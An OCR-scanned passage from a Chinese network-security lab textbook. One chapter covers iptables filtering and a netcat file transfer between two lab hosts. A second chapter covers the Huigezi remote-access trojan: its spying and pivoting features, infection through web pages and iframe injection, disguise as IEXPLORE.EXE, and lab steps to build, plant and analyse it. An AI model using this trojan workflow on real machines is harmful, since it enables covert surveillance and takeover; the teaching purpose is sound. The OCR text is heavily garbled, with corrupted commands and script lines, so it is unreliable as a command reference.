在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 及 Linux, 在 交换 网 络 结构 下 ,每 组 
两 人 ,使 用 iptables、Nmap、Vim、Telnet、Netcat/nc TH. 


16.3 背景 知识 


16.3.1 防火 墙 


防火 墙 是 安装 在 两 个 网 路 之 间 的 一 种 网 路 装置 ,用 来 过 滤 某 些 不 可 靠 的 资料 封包 ,阻止 
网 路 骇 客 (hacker) 的 入 侵 , 并 提供 稽核 及 控制 存 取 网 路 资源 等 服务 。 

防火 墙 的 原理 是 指 设置 在 不 同 网 络 ( 如 可 信任 的 企业 内 部 网 和 不 可 信任 的 公共 网 ) 或 网 
络 安全 域 之 间 的 一 系列 部 件 的 组 合 。 它 是 不 同 网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入 口 ， 
通过 监测 ,限制 .更 改 跨越 防火 墙 的 数据 流 , 尽 可 能 地 对 外 部 屏蔽 网 络 内 部 的 信息 ,结构 和 运 
行 状 况 , 有 选择 地 接受 外 部 访问 ,对 内 部 强化 设备 监管 .控制 对 服务 器 与 外 部 网 络 的 访问 ,在 
被 保护 网 络 和 外 部 网 络 之 间架 起 一 道 屏障 ,以 防止 发 生 不 可 预测 的 、 潜 在 的 破坏 性 侵入 。 

防火 墙 有 两 种 , 即 硬件 防火 墙 和 软件 防火 墙 ,它们 都 能 起 到 保护 作用 并 筛选 出 网 络 上 的 
攻击 者 ,防火 墙 通常 使 用 的 安全 控制 手段 主要 有 包 过 滤 .状态 检测 .代理 服务 , 包 过 滤 技 术 是 
一 种 简单 .有效 的 安全 控制 技术 , 它 通过 在 网 络 间 相互 连接 的 设备 上 加 载 允 许 、 禁 止 来 自 某 
些 特定 的 源 地 址 、 目 的 地 址 .TCP 端口 号 等 规则 ,对 通过 设备 的 数据 包 进 行 检查 ,限制 数据 
包 进 出 内 部 网 络 。 

包 过 滤 的 最 大 优点 是 对 用 户 透明 ,传输 性 能 高 。 但 由 于 安全 控制 层次 在 网 络 层 、 传 输 
层 ,安全 控制 的 力度 也 只 限于 源 地 址 、 目 的 地 址 和 端口 号 ,因而 只 能 进行 较为 初步 的 安全 控 
制 ,对 于 恶意 的 拥塞 攻击 .内存 覆盖 攻击 或 病毒 等 高 层次 的 攻击 手段 , 则 无 能 为 力 。 

状态 检测 是 比 包 过 滤 更 为 有 效 的 安全 控制 方法 。 对 新 建 的 应 用 连接 ,状态 检测 检查 预 
先 设 置 的 安全 规则 ,允许 符合 规则 的 连接 通过 ,并 在 内 存 中 记录 该 连接 的 相关 信息 ,生成 状 


网 络 安全 与 管理 实验 教程 


132 


n 


态 表 。 对 该 连接 的 后 续 数 据 包 ,只 要 符合 状态 表 就 可 以 通过 。 这 种 方式 的 好 处 在 于 : 由 于 
不 需要 对 每 个 数据 包 进 行规 则 检查 ,而 是 一 个 连接 的 后 续 数 据 包 (通常 是 大 量 的 数据 包 ) 通 
过 散 列 算法 ,直接 进行 状态 检查 ,从 而 使 得 性 能 得 到 了 较 大 提高 ;而 且 由 于 状态 表 是 动态 的 ， 
因而 可 以 有 选择 地 ,动态 地 开通 1024 号 以 上 的 端口 ,使 得 安全 性 得 到 进一步 提高 。 


16.3.2 iptables 


netfilter/iptables( 简 称 为 iptables) 组 成 Linux 平台 下 的 包 过 滤 防 火 墙 ,iptables 只 是 一 
个 内 核 包 过 滤 的 工具 ,iptables 可 以 加 入 .插入 或 删除 核心 包 过 滤 表 格 ( 链 ) 中 的 规则 ,位 于 / 
sbin/iptables。 真 正 来 执行 这 些 过 滤 规 则 的 是 netfilter(Linux 内 核 中 一 个 通用 架构 ) 及 其 
相关 模块 (如 iptables 模块 和 nat MIR). GRA BAY Linux 软件 一 样 ,这 个 包 过 滤 防 火 墙 
是 免费 的 , 它 可 以 代替 昂贵 的 商业 防火 墙 解 决 方案 ,完成 封包 过 滤 、 封 包 重 定向 和 网 络 地 址 
转换 (NAT) 等 功能 。 

netfilter 提供 了 一 系列 的 “ 表 (tables)”, 每 个 表 由 若干 “ 链 (chains)” 组 成 ,而 每 条 链 中 有 
一 条 或 数 条 规则 (rule) 组 成 。 可 以 这 样 来 理解 : netfilter 是 表 的 容器 , 表 是 链 的 容器 , 链 又 
是 规则 的 容器 。 

netfilter 系统 默认 的 表 为 filter, 该 表 中 包含 了 INPUT,FORWARD ffl OUTPUT 3 个 
链 。 每 一 条 链 中 可 以 有 一 条 或 数 条 规则 ,每 一 条 规则 都 是 这 样 定义 的 :“ 如 果 数 据 包头 符合 
这 样 的 条 件 ,就 这 样 处 理 这 个 数据 包 ”。 当 一 个 数据 包 到 达 一 个 链 时 ,系统 就 会 从 第 一 条 规 
则 开始 检查 ,看 是 否 符合 该 规则 所 定义 的 条 件 : 输入 数据 输入 数据 
如 果 满 足 , 系 统 将 根据 该 条 规则 所 定义 的 方法 处 
理 该 数据 包 ; 如 果 不 满足 则 继续 检查 下 一 条 规则 。 


输出 链 
最 后 ,如 果 该 数据 包 不 符合 该 链 中 任 一 条 规则 的 
话 ,系统 就 会 根据 预先 定义 的 策略 (policy) 来 处 理 
该 数据 包 。 网 络 数据 包 在 filer 表 中 的 具体 流程 
如 图 16.1 所 示 。 图 16.1 网 络 数据 包 在 filter 表 中 的 流程 


16.4 实验 内 容 


学 习 iptables 包 过 滤 命 令 及 规则 ,利用 iptables 对 网 络 事件 进行 审计 ,配置 iptables 打 
开 指 定 端口 ,使 用 netcat 在 两 台 主 机 间 传 送 文件 。 


16.5 实验 步骤 


16.5.1 包 过 滤 实 验 


本 练习 主机 AB 为 一 组 。 

为 了 应 用 iptables 的 包 过 滤 功 能 ,首先 将 filter 链表 的 所 有 链 规则 清空 ,并 设置 链表 默 
认 策 略为 DROP( 禁 止 )。 通 过 向 INPUT 规则 链 插入 新 规则 ,依次 允许 同 组 主机 icmp 回 显 
TOR Web 请 求 ,最 后 开放 信任 接口 eth0。iptables 操作 期 间 需 同 组 主机 进行 操作 验证 。 
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CD 清空 filter 链表 所 有 规则 链 规则 。 


iptables 命令 : 
iptables - t filter -F 


(2) 同 组 主机 使 用 nmap 工具 对 当前 主机 进行 端口 扫描 。 
nmap 端口 扫描 命令 : 


map - sS -T5 同 组 主机 IP 
查看 端口 扫描 结果 ,并 填写 表 16-1。 
表 16-1 端口 扫描 结果 
开放 端口 (TCP) 提供 服务 


(3) 查看 INPUT、FORWARD fil OUTPUT 链 默 认 策 略 。 
iptables MS: 


iptables -t filter -L 


(4) 将 INPUT.FORWARD fil OUTPUT 链 默 认 策 略 均 设 置 为 DROP. 

iptables MS: 

iptables - P INPUT DROP 

iptables - P FORWARD DROP 

iptables - P OUTPUT DROP 

同 组 主机 利用 nmap 对 当前 主机 进行 端口 扫描 ,查看 扫描 结果 ,并 利用 ping 命令 进行 
连通 性 测试 。 

(5) 利用 功能 扩展 命令 选项 (ICMP) 设 置 防火 墙 仅 允许 ICMP 回 显 请 求 及 回 显 应 答 。 

ICMP 回 显 请 求 类 型 8 ;代码 0 。 

ICMP 回 显 应 答 类 型 0 ;代码 0 。 

iptables 命令 : 

iptables - I INPUT -p icmp - - icmp- type 8/0 - j ACCEPT 

iptables - I OUTPUT - p iam - - iamp- type 0/0 -j ACCEPT 

利用 ping 指令 测试 本 机 与 同 组 主机 的 连通 性 。 

(6) 对 外 开放 Web 服务 (默认 端口 80/tcp) 。 


iptables 命令 ; 
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iptables - I INPUT -p tcp -- dport 80 -j ACCEPT 

iptables - I OUTEUT - p tcp - - sport 80 - j ACCEPT 

同 组 主机 利用 nmap 对 当前 主机 进行 端口 扫描 ,查看 扫描 结果 。 

(7) 设置 防火 墙 允许 来 自 eth0( 假 设 etho 为 内 部 网 络 接口 ) 的 任何 数据 通过 。 


iptables 命令 : 


iptables — A INPUT - i eth0 -j ACCEPT 

iptables - A OUTPUT - o eth0 - j ACCEPT 

同 组 主机 利用 nmap 对 当前 主机 进行 端口 扫描 ,查看 扫描 结果 。 
16.5.2 事件 审计 实验 


利用 iptables 的 日 志 功 能 检测 .记录 网 络 端口 扫描 事件 ,日 志 路 径 /var/log/ 
iptables. log. 

COD 清空 filter 表 所 有 规则 链 规则 。 

iptables 命令 : 

iptables - F 

(2) 设计 iptables 包 过 滤 规 则 ,并 应 用 日 志 生 成 工具 ULOG 对 iptables 捕获 的 网 络 事 
件 进行 响应 。 

iptables 命令 : 

iptables - I INPUT -p tcp - - tcp- flag ALL SYN -j ULOG- -ulog- prefix "SYN Request" 

(3) 同 组 主机 应 用 端口 扫描 工具 对 当前 主机 进行 端口 扫描 ,并 观察 扫描 结果 。 


(4) 在 同 组 主机 端口 扫描 完成 后 ,当前 主机 查看 iptables 日 志 , 对 端口 扫描 事件 进行 审 
计 , 日 志 内 容 如 图 16. 2 所 示 。 


bs 12 18: p or localhost SYN nawa IN-etho OUT= MC OO Oc :29 :d7 : - 2b:00:00:e 
72.16. 


图 16.2 日 志 内 容 


16.5.3 开放 /关闭 指定 端口 用 于 传输 文件 


本 实验 通过 手动 配置 和 编写 脚本 两 种 方式 对 iptables 进行 配置 ,实现 控制 对 于 指定 端 
口 的 关闭 和 开放 。 在 开放 端口 后 通过 该 开放 端口 在 两 台 主 机 之 间 通 过 netcat 传送 文本 文 
件 的 内 容 。netcat 是 一 个 非常 简单 的 UNIX TA. Wik. TCP 或 UDP 网 络 连接 
(network connection) 。 它 被 设计 成 一 个 可 靠 的 后 端 (back-end) 工具 ,能 被 其 他 的 程序 或 脚 
本 直接 地 或 容易 地 驱动 。 同 时 , 它 又 是 一 个 功能 丰富 的 网 络 调试 和 开发 工具 ,因为 它 可 以 建 
立 你 可 能 用 到 的 几乎 任何 类 型 的 连接 ,以 及 一 些 非常 有 意思 的 内 建功 能 。netcat 的 实际 可 
运行 的 名 字 叫 nc, 应 该 很 早 就 被 提供 .就 像 另 一 个 没有 公开 但 是 标准 的 UNIX TH. 
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1. 手动 配置 


打开 主机 A 的 Linux 终端 ,首先 查看 iptables 当前 配置 ,如 图 16. 3 Aras. 


图 16.3 查看 当前 配置 


下 面 添 加 规则 来 关闭 9999 端口 ,如 图 16. 4 所 示 。 


图 16.4 关闭 9999 端口 


然后 查看 iptables 配置 文件 ,如 图 16. 5 所 示 


[root@sqlserver ~]# cat /etc/sysconfig/iptables 
# Generated by iptables-save v1.4.7 on Fri Jan 16 18:50:58 2015 
*filter 

:INPUT ACCEPT [19:1514] 

: FORWARD ACCEPT [0:0] 

:OUTPUT ACCEPT [21:1976] 

-A INPUT -p tcp -m tcp --dport 9999 -j DROP 

-A INPUT -p tcp -m tcp dport 9001 -j DROP 

-A INPUT -p tcp -m tcp dport 7000 -j ACCEPT 
-A INPUT -p tcp -m tcp --dport 9996 -j ACCEPT 
COMMIT 

# Completed on Fri Jan 16 18:50:58 2015 


图 16.5 查看 iptables 配置 文件 


可 以 看 到 针对 9999 端口 的 规则 添加 ,当前 9999 端口 被 关闭 。 下 面 尝 试用 netcat 在 
9999 端口 监听 ,通过 9999 端口 向 主机 B 传送 一 个 文件 。 首先 在 主机 A 运行 nc 命令 监听 
9999 端口 ,如 图 16. 6 所 示 


[root@sqlserver ~]# cat abc | nc -1 9999 


图 16.6 监听 9999 端口 
然后 在 主机 B 连接 主机 A 的 9999 端口 ,试图 接收 文件 内 容 到 本 地 文件 ,如 图 16. 7 
所 示 o 


abc 


onnection refused 


图 16.7 接收 内 容 到 本 地 失败 


9, 因 此 主机 B 无 法 连接 主机 A 的 该 
:机 A 的 9999 端口 ,如 图 16. 8 Bra. 


n| 


以 看 到 ,由 于 主机 A 的 iptables 关闭 了 端口 995 
端口 ,也 就 无 法 通过 netcat 来 传送 文件 。 下 面 来 打开 = 


a 
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[root@sqlserver ~]# sudo /sbin/iptables -D INPUT -p tcp -m tcp --dport 9999 -j DROP 
[root@sqlserver ~]# /sbin/service iptables save 
iptables: Saving firewall rules to /etc/sysconfig/iptables:[ OK ] 


[root@sqlserver ~]# sudo /sbin/iptables -I INPUT -p tcp -m tcp --dport 9999 -j ACCEPT 
[root@sqlserver ~]# /sbin/service iptables save 
iptables: Saving firewall rules to /etc/sysconfig/iptables:[ OK ] 


图 16.8 打开 主机 A AY 9999 端口 


再 次 查看 iptables 配置 文件 ,如 图 16. 9 Bros 


[root@sqlserver ~]# cat /etc/sysconfig/iptables 
# Generated by iptables-save v1.4.7 on Fri Jan 16 18:56:34 2015 
*filter 
:INPUT ACCEPT [10:730] 
:FORWARD ACCEPT [0:0] 
:OUTPUT ACCEPT [7:788] 
tcp -m tcp --dport -j ACCEPT 
tcp -m tcp --dport -j DROP 
tcp -m tcp --dport -j ACCEPT 
tcp -m tcp --dport -j ACCEPT 


on Fri Jan 


图 16.9 再 次 查看 iptables 配置 文件 


可 以 看 到 9999 端口 的 规则 发 生 了 变化 ,由 DROP 变 为 ACCEPT ,这 意味 着 iptables 打 
FT 9999 端口 。 下 面 再 次 尝试 用 netcat 从 主机 A 传送 文件 到 主机 B。 首 先 在 主机 A 上 监 
Wr 9999 端口 ,如 图 16. 10 所 示 


[root@sqlserver ~]# cat abc | nc -1 9999 


图 16.10 在 主机 A 上 监听 9994 


Sig ET 
然后 在 主机 B 上 连接 主机 A 的 9999 端口 ,并 将 接收 到 的 内 容重 定向 到 本 地 文件 abc. 
如 图 16. 11 所 示 。 


root@ubuntu:~# telnet 147.128.123.40 9999 > abc 
onnection closed by foreign host. 


Kd 16.11 接收 内 容 到 本 地 成 功 


可 以 看 到 ,主机 B 成 功 连接 到 了 主机 A 的 9999 端口 ,并 且 在 文件 传送 完毕 以 后 ,主机 
A 主动 关闭 了 该 连接 , 接 下 来 可 以 查看 主机 B 本 地 文件 接收 到 的 内 容 是 否 跟 主机 A 发 送 的 
内 容 是 一 致 的 。 

主机 A 的 文件 如 图 16. 12 所 示 。 


[root@sqlserver ~]# cat abc 
adfadsfadsfasdfsdafasdfaf 


图 16.12 主机 A 的 文件 


主机 B 的 文件 如 图 16. 13 所 示 。 
可 以 看 到 主机 B 完全 接收 到 了 主机 A 发 送 过 来 的 内 容 。 


Trying 147.128.1 


Connected to 
Escape character is 了 
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adfadsfadsfasdfsdafasdfaf 
图 16. 13 
2. 编写 脚本 批量 打开 /关闭 端口 


如 果 需 要 批量 在 iptables 打开 或 者 关闭 一 些 端 
可 以 编写 脚本 来 批量 完成 规则 的 


主机 B 的 文件 


,一 条 条 添加 规则 显然 过 于 烦琐 ,因此 
加 或 删除 ,本 实验 任务 就 是 在 Linux 下 用 Vim 编辑 脚 


本 ,实现 批量 添加 删除 规则 的 功能 ,并 且 保证 脚本 能 成 功 运行 。 


这 里 给 出 一 个 打开 批量 端口 的 例 程 , 仅 供 参考 。 


#!/bin/sh 


IPTABIES CFG FIIE- "/etc/sysconfig/iptables" 
IPTABLES SERVICE- "/sbin/service iptables" 
IPTABLES "/sbin/iptables" 

AS FORT- "9001 8080 2812 22 21 20" 


#Check if iptables has been installed 


ret- 'rpm - qa | grep iptables> /dev/null 2» &1; echo $? ' 


if [$ret - ne 0 ]; then 
echo "ERROR: Fail to find iptables." 
exit 1 

fi 


if [! - f SIPTAHIES CFG FIIE ]; then 
echo "ERROR: Fail to find $IPTABLES CFG FIIE" 
exit 2 


fi 


#Config IP Filter 
#Add new items 
for port in $AS FORT 


iptable tcp- "'$ (IPTABIES) -L -n | grep \":${port}\" | grep - e V'^ACCEPT[[:space:]] * tapN" 


do 
if ["${iptable_top}"=="" ]; then 
$IPTABIES — I INPUT -p tcp - - dport $port - j ACCEPT 
fi 
done 
#Save changes 


SIPTAHIES SERVICE save 


#Restart IP Filter 
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$IPIABIES SERVICE restart 
16.6 思考 问题 
1. 为 什么 通常 要 把 所 有 链 的 预 设 策略 都 设置 成 DROP? 
2. 如 果 规 则 链 中 有 两 条 规则 是 相互 矛盾 的 ,例如 前 一 条 是 禁止 某 个 端口 ,后 一 条 是 打 


开 这 个 端口 ,请 问 这 会 出 现 什么 情况 ? 
3. 考虑 限制 实现 其 他 常见 的 网 络 功能 ,如 FTP 远程 控制 .QQ 服务 等 的 实现 。 
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第 17 章 ”计算 机 木马 攻击 


17.1 实验 目的 与 要 求 


。 掌握 计算 机 木马 攻击 的 原理 。 

。 了 解 通过 计算 机 木马 对 被 控制 主机 的 攻击 过 程 。 
”了 解 典 型 的 计算 机 木马 运行 特点 。 

* 了解 计 算 机 木马 的 印 载 与 删除 。 


17.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003, 在 交换 网 络 结构 下 ,每 组 两 人 ,使 
用 灰 铝 子 客户 端 软件 。 


17.3 背景 知识 


木马 ,全 称 为 特洛伊 木马 (Trojan Horse).“ 特 洛 伊 木马” 这 一 词 最 早出 现在 希腊 神话 
传说 中 。 相 传 在 3000 年 前 ,在 一 次 希腊 战争 中 。 麦 尼 劳 斯 (人 名 ) 派 兵 讨伐 特洛伊 (王国 )， 
但 久 攻 不 下 。 他 们 想 出 了 一 个 主意 : 首先 他 们 假装 被 打败 ,然后 留 下 一 个 木马 。 而 木马 里 
面 却 藏 着 最 强悍 的 勇士 。 最 后 等 时 间 一 到 ,木马 里 的 勇士 全 部 冲 出 来 把 敌人 打败 了 。 这 就 
是 后 来 有 名 的 “木马 计 ” 一 一 把 预谋 的 功能 隐藏 在 公开 的 功能 里 ,掩饰 真正 的 企图 。 

计算 机 木马 程序 一 般 具 有 以 下 几 个 特征 。 

主 程序 有 两 个 ,一 个 是 服务 端 , 另 一 个 是 控制 端 。 服 务 端 需要 在 主机 执行 。 当 控制 端 连 
接 服务 端 主机 后 ,控制 端 会 向 服务 端 主机 发 出 命令 。 而 服务 端 主机 在 接受 命令 后 ,会 执行 相 
应 的 任务 。 

一 般 木 马 程序 都 是 隐蔽 的 进程 ,不 易 被 用 户 发 现 。 木 马 的 工作 过 程 可 分 为 四 部 分 : 木 
马 的 植 人 \ 木 马 的 安装 .木马 的 运行 和 木马 的 自 启动 。 

IKF JITE: 

2000 4E. 58 — 7S WAS B DR BS FEE ,并 被 各 大 安全 厂商 “关注 ”。 

2002 年 灰 鲍 子 被 安全 厂商 列 人 病毒 库 。 

2003 年 灰 鲍 子 “ 牵 手 版 ?受到 安全 爱好 者 的 追捧 ,使 用 人 数 超过 冰河 。 

2003 年 灰 鸽 子 工 作 室 开 始 进 行商 业 运作 ,对 用 户 实 行 会 员 制 。 

2004 年 灰 鸽 子 变 种 病毒 泛滥 ,广大 网 友 谈 * 灰 ” 色 变 。 

2005 年 灰 鲍 子 发 展 迅 速 , 灰 鸽子 工作 室 网 站 访问 量 保持 上 升 状 态 , 论 坛 注册 会 员 突破 
90000 A. 

2006 年 灰 铅 子 的 发 展 达到 顶峰 ,占据 了 木马 市 场 的 半壁 江山 。 
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2007 年 灰 久 子 引起 国内 各 大 杀毒 软件 厂商 的 声讨 ,对 灰 名 子 的 “全 民 围 剿 ” 正 式 开始 。 
RSF THEE RARA 。 

HERTZE ey. Red PR SFT WE Ae PT SE CAES HES f SR AR AY DY e s 
fij Dy (EGE R9 3 PE. BSE AS Bek CE f He fl A E FE JF AB IE ILAH. ARS T A P i AR 9B: 
采用 Delphi 编写 。 利 用 客户 端 程序 配置 出 服务 端 程序 ,可 配置 的 信息 主要 包括 上 线 类 型 
(如 等 待 连接 还 是 主动 连接 ) .主动 连接 时 使 用 的 公 网 IP( 域 名 ) .连接 密码 、 使 用 的 端口 . 启 
动 项 名 称 、. 服 务 名 称 、. 进 程 隐藏 方式 使 用 的 壳 、 代 理 、 图 标 等 。 

灰 钥 子 木 马 的 基本 功能 有 以 下 几 个 方面 : 

CD 反 向 连接 。 由 木马 的 “服务 器 程序 ”主动 发 起 连接 ,这 种 连接 方式 也 称 为 “反弹 木 
马 ”, 它 的 优点 是 可 以 突破 NAT 和 防火 墙 。 

(2) 文件 管理 。 可 以 操作 (查看 ,新建 .删除 等 ) 被 控 主 机 的 文件 系统 及 上 传 下 载 文 件 。 

(3) 注册 表 管 理 。 可 以 操作 (查看 、 新 建 、 删 除 等 ) 被 控 主机 的 注册 表 项 。 

(4) 系统 信息 查看 。 可 以 查看 被 监控 主机 的 系统 配置 信息 等 。 

(5) 剪贴 板 查看 。 可 以 查看 被 监控 主机 的 剪贴 板 内 容 。 

(6) 进程 管理 。 可 以 查看 被 监控 主机 的 进程 表 或 杀 死 某 个 进程 。 

(7) 服务 管理 。 可 以 启动 .停止 被 监控 主机 的 服务 程序 。 

(8) 共享 管理 。 可 以 新 建 . 删 除 被 监控 主机 的 共享 。 

(9) Telnet。 可 以 远程 控制 被 监控 主机 的 命令 行 。 

(10) 配置 代理 服务 器 。 可 以 利用 被 控制 主机 为 跳板 ,对 第 三 方 进行 攻击 。 

QD 插件 功能 。 可 以 绑 定 第 三 方 软件 。 

(12) 命令 广播 。 控 制 端 可 以 把 控制 命令 一 次 性 广播 到 若干 台 计 算 机 。 

(13) 捕获 屏幕 。 可 以 查看 被 监控 主机 的 屏幕 图 像 。 

(14) 视频 语音 。 可 以 进行 视频 监控 和 语音 监听 。 


17.3.1 木马 的 植 人 


网 页 木马 是 一 个 由 黑客 精心 制作 的 含有 木马 的 HTML 网 页 ,因为 MS06014 漏洞 存 
在 , 当 用 户 浏览 这 个 网 页 时 就 被 在 后 台 自 动 安装 了 木马 的 安装 程序 。 所 以 黑客 会 千方百计 
地 诱惑 或 者 欺骗 人 们 去 打开 他 所 制作 的 网 页 ,进而 达到 植 入 木马 的 目的 。 不 过 随 着 人 们 网 
络 安全 意识 的 提高 ,这 种 方法 已 经 很 难 欺骗 大 家 了 。 

还 有 一 种 方法 就 是 通过 到 iframe> 标 签 ,在 一 个 正常 网 站 的 主页 上 链接 网 页 森马。 浏览 者 
在 浏览 正常 的 网 站 主页 时 ,iframe 语句 就 会 链接 到 含有 木马 的 网 页 ,网 页 木马 就 被 悄悄 植 人 
了 。 这 种 方法 就 是 大 家 经 常 说 的 “ 挂 马 ”, 而 中 了 木马 的 主机 通常 被 幽默 地 称 为 “肉鸡 ”.“ 挂 
马 ? 因 为 需要 获取 网 站 管理 员 的 权限 ,所 以 难度 很 大 。 不 过 它 的 危害 也 是 十 分 巨大 的 ,如 果 黑 客 
获得 了 一 个 每 天 流量 上 万 的 知名 网 站 的 管理 员 权 限 并 成 功 “ 挂 马 ”, 那 试想 他 会 有 多 少 “ 肉 鸡 ”。 


17.3.2 木马 的 安装 


木马 的 安装 在 木马 植 人 后 就 被 立即 执行 。( 本 实验 以 灰 鲍 子 木 马 程序 为 例 ) 当 网 页 木马 
植 人 后 ,木马 会 按照 通过 网 页 木马 脚本 中 指向 的 路 径 下 载 木马 服务 端 安装 程序 ,并 根据 脚本 
中 的 设 定 对 安装 程序 进行 重 命名 。 通 常会 重新 命名 一 个 与 系统 进程 相近 的 名 字 来 迷惑 管理 


a 
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员 ,使 安装 过 程 及 其 留 下 的 痕迹 不 通过 细心 查看 不 易 被 发 觉 。 安 装 程序 下 载 完成 后 ,自动 进 
行 安装 。 生 成 可 执行 文件 ,并 修改 注册 表 生成 系统 服务 。 


17.3.3 木马 的 运行 


灰 蚀 子 木马 服务 器 安装 完成 后 就 会 立刻 连接 网 络 寻 找 客户 端 ,并 与 其 建立 连接 。 这 时 
木马 程序 会 将 自己 的 进程 命名 为 IEXPLORE. EXE, 此 进程 与 Windows 的 I 浏览 器 进程 
同名 ,同样 是 为 了 迷惑 管理 员 来 伪装 自己 。 当 木马 服务 端 与 客户 端 建立 连接 后 ,客户 端 就 如 
同 拥有 了 管理 员 权限 一 样 , 可 随意 对 “肉鸡 ”进行 任何 操作 。 


17.3.4 木马 的 自 启 动 


木马 安装 时 生成 系统 服务 。 启 动 类 型 :“ 自 动 "很 明显 可 以 看 出 灰 蚀 子 是 通过 此 系统 服务 
执行 hack. com. cn. ini 文件 来 自 启动 木马 服务 器 。 存 在 于 系统 日 录 下 的 Hack. com. cn. ini 
文件 被 设置 成 一 个 隐藏 的 受 保护 的 操作 系统 文件 ,很 难 被 人 发 现 。 


17.4 实验 内 容 


灰 铝 子 木马 是 网 络 上 常见 的 并 且 功 能 强大 的 远程 后 门 软件 。 采 用 DLL 注入 技术 ,开启 
服务 程序 ,从 而 实现 远程 控制 的 目的 。 本 实验 以 灰 钥 子 木 马 为 例 , 学 习 木马 制作 、 木 马 种 植 、 
木马 分 析 、 印 载 木 马 和 木马 功能 验证 的 具体 操作 。 


17.5 实验 步骤 


启动 虚拟 机 ,并 设置 虚拟 机 的 TP 地 址 ,以 虚拟 机 为 目标 主机 进行 实验 。 实 验 学 生 可 以 
两 人 一 组 , 互 为 攻击 方 和 被 攻击 方 来 做 实验 。 
17.5.1 木马 制作 

根据 木马 服务 器 配置 制作 灰 鸟 子 木 马 ,配置 安装 目录 如 图 17. 1 所 示 。 


安装 成 功 后 自动 删除 安装 广 
程序 运行 时 在 任务 栏 显示 和 


保存 路 径 JC: Documents and Setting: 回 | [生成 服务 器 | 


图 17.1 配置 木马 程序 安装 目录 
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配置 木马 程序 启动 项 如 图 17. 2 所 示 。 


国 Win98/2000/ 凶 下 写 入 注册 表 启动 项 
回 Win20007zP 下 优先 安装 成 服务 启动 
显示 名 称 : [huigezi 
服务 名 称 : | 实验 测试 程序 


描述 信息 : ABIRERE 


图 17.2 配置 木马 程序 启动 项 


高 级 设置 ,选择 使 用 浏览 器 进程 启动 ,并 生成 服务 器 程序 ,如 图 17. 3 所 示 。 


回 使 用 IEXPLORE. EXE 进程 启动 服务 端 程序 
隐藏 服务 端 进 程 。 只 支持 Win2000/xp 系统 
说 明 : 

使 用 IEXPLORE. EXE 进程 启动 只 支持 Win20007XP 系 统 ? 


OTME Of ux MF 


保存 路 径 |C: \Documents and Setting: 


图 17.3 配置 木马 程序 启动 进程 


17.5.2 木马 种 植 


通过 漏洞 或 溢出 得 到 远程 主机 权限 ,上 传 并 运行 灰 铝 子 木 马 , 本 地 对 植 和 人 灰 钥 子 的 主机 
进行 连接 ,看 是 否 能 连接 灰 钢 子 。 


17.5.3 木马 分 析 


将 木马 制作 实验 中 产生 的 服务 器 端 程序 运行 在 网 络 上 的 另外 一 台 主 机 上 。 

1. 查看 端口 

当 木 马 服务 器 端 启动 之 后 ,会 在 本 地 灰 钥 子 客户 端 发 现 有 主机 上 线 ,说明 灰 铝 子 已 经 启 
动 成 功 , 如 图 17.4 所 示 。 

查看 远程 主机 的 开放 端口 ,如 图 17. 5 所 示 , 肉鸡 的 地 址 192. 168. 50. 151 正在 与 本 地 
192. 168. 50. 40 连接 ,表示 肉鸡 已 经 上 线 , 可 以 对 其 进行 控制 ,如 图 17. 5 所 示 。 
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E KK2$-1-2008 www. whxtpc. cn 专 版 192. 168. 1. 40, 192. 168. 56. 1,... 


[7x7] 


aeo 


文件 (E) 设置 (@) 


IRT 


帮助 四 


搜索 内 容 ， 
文件 管理 器 


自动 上 战 主机 


MEDE | al g $i 
自动 上 线 | 捕获 屏幕 | 视频 语音 | Telnet | 配置 服务 程序 ht | RH 
当前 连接 :| 192 168 .50.151- 局 域 网 】 电脑 名 称 |Sw 连接 密码 _ 


了 | 搜索 结果 :显示 搜索 结果 ~ 
远程 控制 命令 [注册 表 编辑 器 [命令 广播 | 


文件 目录 浏览 


«{ " 


(&][8 Le Lx) Le) [i [nes 
NIE | 大 小 字 节 ) | 修改 日 期 | = 
15171 | Ca WINDOWS 2009-07-29 09:45 
Docunents an... 2009-07-29 10:29 
Dprogran Files 2009-07-29 10:91 
DInetpub 2009-07-29 10:54 三 
Dmpub 2009-07-29 10:58 
Oftpfile 
加 新建 文件 夹 
agentAudit (R... 
Recycled 01-81 
Cacaconfig 2009-07-31 
口 病 毒 实验 2009-10-14 
Yord2003 2009-10-14 
加 isSec 单 机 病毒 2009-10-14 
|| 回 ntldr 304752 2005-05-02 ~ 


文件 列表 读 职 完毕 .16 


读 职 文 件 列表 命令 发 送 成 功 ! 


12:34 


J24 个 对 象 ” 当前 路 径 ; C:\ 


«[m 


.8. 
-0. 
.8. 
.8. 
-8 
8 
-8 
.8 
-8 
B 
.8 


RE 
-6. 
6. 
.8. 
.8. 
"m 
168. 
168 
168 
168 


C:\Documents 


2. 查看 进程 
启动 icesword 检查 了 


192.168.59.49:1429 


192.168.58. 
192.168.589. 
192.168.58 
DE 


PXEIErititririfgiii 
X X XX X X X x x xxx 


Settings \Administrator> 


图 17.5 


查看 远程 主机 的 开放 


LISTENING 
LISTENING 
LISTENING 
ESTABLISHED 
TIME_WAIT 
TIME_WAIT 
ESTABLISHED 


端口 
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开放 进程 ,进程 中 多 出 了 IEXPLORE. EXE 进程 ,这 个 进程 即 为 启 
动 灰 蚀 子 木马 的 进程 ,起 到 了 隐藏 灰 蚀 子 自身 程序 的 日 的 ,如 图 17.6 所 示 。 
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-Aplxl 
文件 sei 插件 外 观 帮助 
i- X fr ous 
si 
9 []svcuosr. exe 908 C: \WINDOWS\Systen32\SVCHOST. EXE 8 Ox821056D0 
进程 EsvcwosT. exe. 972 C: WINDOWSXSysten32VSVCHOST. EXE 8 Ox82256D88 
A |6-Qusprc. EXE 1188 C: \WINDOWS\Syst en32\MSDTC. EXE 8 Ox8215CBS8 
a [Elnscorsvr. exe 1304 C:\WINDOWS Wi crosoft. NET\Franework\v2. 0. 50727 \m. 8 0x82100558 
‘ Eons. exe 1344 C: WINDOWS \System32\DNS. EXE 8 Ox821263E0 
sol 回 mnrnro exe 1388 C: \WINDOWS\Syst en32\INETSRV\INETINFO. EXE 8 0x8213F578 
(ISOLSERVR. EXE 1424 C:\Program Files\Microsoft SQL Server\MSSQL\Bin. 8 Ox820CB4B8 
B Sj EXPLORER. EXE 1476 C: \WINDOWS\EXPLORER EXE 8 OxS21CO4TO 
内 核 模块 ”| 回 sychosT. exe 1488 C: WINDORSVSysten32VSVCHOST. EXE 8 OxS213FBFO 
